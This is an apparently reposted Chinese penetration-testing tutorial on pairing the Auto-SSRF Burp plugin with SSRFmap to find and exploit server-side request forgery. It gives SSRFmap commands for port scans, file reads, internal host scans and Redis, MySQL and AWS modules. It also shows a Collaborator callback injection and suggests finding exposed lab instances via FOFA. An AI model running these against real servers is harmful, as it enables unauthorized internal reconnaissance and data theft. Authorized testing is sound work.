用Auto-SSRF+SSRFmap构建SSRF自动化利用链

admin
admin
admin
0
文章
0
评论
2026-03-05 19:57:46 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 文章介绍了Auto-SSRF和SSRFmap两个工具的配合使用方法,实现SSRF漏洞的自动化探测与利用。Auto-SSRF插件可自动化探测BurpSuite历史包中疑似存在SSRF的数据包,配合Collaborator功能进行盲注验证;SSRFmap则用于对确认的SSRF漏洞进行端口扫描、文件读取、内网主机扫描等自动化攻击。文章还提供了具体的测试命令、工具配置方法及常见安装问题的解决方案,具有较强的实战参考价值。 综合评分: 76 文章分类: 渗透测试,安全工具,漏洞POC,WEB安全,内网渗透

cover_image

用Auto-SSRF+SSRFmap构建SSRF自动化利用链

原创

游山玩水 游山玩水

山水SRC

2026年3月5日 08:05 河南

概述

本文讲解了使用Auto-SSRF+SSRFmap对ssrf漏洞的探测和利用

Auto-SSRF

作用:自动化探测出bp历史包中可能存在ssrf的数据包并且进行盲注(探测出是否存在ssrf)

项目:https://github.com/banchengkemeng/Auto-SSRF

测试:

①bp开启Auto-SSRF插件配置(proxy和repeater都开开)

②开启bp自带的Collaborator功能

开启后视图

检查Collaborator是否能正常运行(Collaborator的作用和dnslog一样)

可能因为连接的是校园网导致Collaborator无法使用(连流量就行,亲测有用)

第④步全绿算Collaborator能用

③对网站点点点,看Auto-SSRF插件页面

现在已经探测出网站哪些数据包疑似出现ssrf了,将数据包保存,放入SSRFmap跑

SSRFMap

功能:将一个已被确认的SSRF漏洞点,转化为自动化探测和攻击内网的武器

项目:https://github.com/swisskyrepo/SSRFmap

测出来下面内容就可以交漏洞了

必做测试(每个SSRF都要测)(request.txt为auto-ssrf探测出存在ssrf漏洞的数据包/url为ssrf注入参数)



# 1. 端口扫描(确认漏洞)
python ssrfmap.py -r request.txt -p url -m portscan

# 2. 文件读取尝试
python ssrfmap.py -r request.txt -p url -m readfiles

# 3. 内网主机扫描
python ssrfmap.py -r request.txt -p url -m hostscan

选择测试(根据情况)



# 如果发现Redis端口
python ssrfmap.py -r request.txt -p url -m redis

# 如果发现MySQL端口
python ssrfmap.py -r request.txt -p url -m mysql

# 如果是云服务器
python ssrfmap.py -r request.txt -p url -m aws

探测端口效果图

建议

①两个工具配置好了可以使用piakchu靶场试试效果,如果原本没搭建或者嫌麻烦的可以去fofa搜一个(”pikachu” && country=”CN”)

②好像能dns外带就算ssrf漏洞(有懂得师傅麻烦在评论区回答一下)

可以使用bp的Collaborator功能测试

复制出的url(复制出剪切板的内容1prqwst9tmo6s6a3xvnjtgo0xr3ir9fy.oastify.com)填入注入点

比如

http://xxxxxxxx/vul/ssrf/ssrf_fgc.php?file=http://1prqwst9tmo6s6a3xvnjtgo0xr3ir9fy.oastify.com

点击立即轮询,看http对应的ip只要是对方的就存在ssrf

③SSRFMap工具安装踩坑点,就是执行

pip install -r requirements.txt报错了

解决方法

  • 创建虚拟环境

    在 E:\SSRFmap-master\SSRFmap-master目录下,打开命令行运行:



  python -m venv venv

这会在当前文件夹内创建一个名为 venv的虚拟环境目录。

  • 激活虚拟环境


  venv\Scripts\activate

激活后,您的命令行提示符前通常会显示 (venv),表示您已经进入了虚拟环境。之后的所有 pip安装都会安装到这个本地 venv目录中,完全不需要系统权限。

  • 安装依赖

    在激活的 (venv)环境中,再次运行安装命令:



  pip install -r requirements.txt

这次应该可以顺利安装,不会再出现权限错误。

成功后会出现venv

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:山水SRC 游山玩水 游山玩水《用Auto-SSRF+SSRFmap构建SSRF自动化利用链》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0